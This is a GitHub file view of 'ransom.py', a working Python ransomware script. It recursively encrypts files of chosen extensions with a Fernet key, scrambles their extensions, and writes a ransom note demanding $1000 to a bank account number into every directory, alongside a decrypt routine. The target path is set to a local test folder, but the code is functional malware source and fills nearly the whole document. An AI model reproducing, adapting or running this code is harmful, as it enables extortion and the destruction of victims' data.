-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathransom.py
137 lines (115 loc) · 5.11 KB
/
ransom.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
import os
import sys
from os.path import expanduser
from cryptography.fernet import Fernet
import base64
import shutil
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
class Ransomware:
def __init__(self, key=None):
self.cryptor = None
self.file_ext_targets = ['txt','png','pdf','exe','zip','rar','jni','pok','eft','uhg','thu','jpg','pjp']
def generate_key(self):
#RNDOM KEY GENERATOR USING FERNET
self.key = Fernet.generate_key()
self.cryptor = Fernet(self.key)
def read_key(self, keyfile_name):
#get key when decrypting
with open(keyfile_name, 'rb') as f:
self.key = f.read()
self.cryptor = Fernet(self.key)
def write_key(self, keyfile_name):
#store key to use for decryption
with open(keyfile_name, 'wb') as f:
f.write(self.key)
def crypt_root(self, root_dir, encrypted=False):
#Browse every folder recurvisely and each file with the mentioned extension
#warning msg
banner="""
88 88 db ,ad8888ba, 88 a8P 88888888888 88888888ba,
88 88 d88b d8'' `'8b 88 ,88' 88 88 `'8b
88 88 d8'`8b d8' 88 ,88' 88 88 `8b
88aaaaaaaa88 d8' `8b 88 88,d88' 88aaaaa 88 88
88aaaaaaaa88 d8YaaaaY8b 88 8888'88, 88''''' 88 88
88 88 d8aaaaaaaa8b Y8, 88P Y8b 88 88 8P
88 88 d8' `8b Y8a. .a8P 88 '88, 88 88 .a8P
88 88 d8' `8b `'Y8888Y'' 88 Y8b 88888888888 88888888Y'' """
message="\nYOUR PC HAS BEEN HACKED\nIF YOU WANT TO GAIN CONTROL\nTRANSFER THE $1000 TO BELOW ACCOUNT NUMBER\n315185351213"
for root, _, files in os.walk(root_dir):
for f in files:
abs_file_path = os.path.join(root, f)
# if not a file extension target, pass
if not abs_file_path.split('.')[-1] in self.file_ext_targets:
continue
#cleaning up readme and hacked.png
elif (f.split('.')[-1]=="txt" or f.split('.')[-1]=="png") and encrypted:
os.remove(abs_file_path)
continue
#sending file to encrypt/decrypt
self.crypt_file(abs_file_path, encrypted=encrypted)
if not encrypted:
#creating readme and hacked.png in each directory
for root, _, files in os.walk(root_dir):
shutil.copy(resource_path('Hacked.png'),root)
with open(os.path.join(root,'ReadMe.txt'),'w') as f:
f.write(banner)
f.write(message)
def crypt_file(self, file_path, encrypted=False):
#encrypt/decrypt the data
change_ext={"txt":"jni","rar":"pok","pdf":"eft","png":"uhg","zip":"thu","jni":"txt","pok":"rar","eft":"pdf","uhg":"png","thu":"zip","jpg":"pjp","pjp":"jpg"}
with open(file_path, 'rb+') as f:
_data = f.read()
if not encrypted:
data = self.cryptor.encrypt(_data)
else:
data = self.cryptor.decrypt(_data)
f.truncate(0)
f.seek(0)
f.write(data)
#change the extension
name,ext=file_path[:-3],file_path[-3:]
os.rename(file_path,name+change_ext[ext])
if __name__ == '__main__':
# sys_root = expanduser('~')
local_root = '../test/'
Ransom = Ransomware()
flag=False
'''Ransom.generate_key()
Ransom.write_key('keyfile')
Ransom.crypt_root(local_root)'''
with open("keyfile",'a+') as f:
f.seek(0)
read=f.read()
if read=="":
print('Encrypting')
Ransom.generate_key()
Ransom.write_key('keyfile')
Ransom.crypt_root(local_root)
else:
flag=True
print("Decrypting")
Ransom.read_key('keyfile')
Ransom.crypt_root(local_root, encrypted=True)
if flag:
os.remove("keyfile")
'''if sys.argv[1] == 'decrypt':
with open("keyfile",'a+') as f:
f.seek(0)
read=f.read()
if read=="":
print('KeyFile is empty')
else:
Ransom.read_key('keyfile')
Ransom.crypt_root(local_root, encrypted=True)
os.remove("keyfile")
elif sys.argv[1] == '':
Ransom.generate_key()
Ransom.write_key('keyfile')
Ransom.crypt_root(local_root)'''